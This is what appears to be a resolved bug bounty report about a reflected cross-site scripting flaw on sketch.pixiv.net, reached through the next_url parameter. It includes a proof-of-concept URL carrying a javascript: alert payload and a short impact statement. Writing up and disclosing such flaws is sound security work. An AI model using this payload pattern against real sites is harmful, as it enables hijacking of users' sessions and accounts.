XSS Reflected at https://sketch.pixiv.net/ Via `next_url`
Medium
P
pixiv
Submitted None
Actions:
Reported by
find_me_here
Vulnerability Details
Technical details and impact analysis
Hi,
I Found XSS Reflected at https://sketch.pixiv.net/ Via Success URL
##Follow Me :)
##Steps :
1. Open the URL below:
https://sketch.pixiv.net/resign_request/success?next_url=javascript%3Aalert%2F**%2F(document.domain)
2. Pop ups appear :)
## Impact
If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user. Amongst other things, the attacker can: Perform any action within the application that the user can perform
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Bounty
$500.00
Submitted
Weakness
Cross-site Scripting (XSS) - Reflected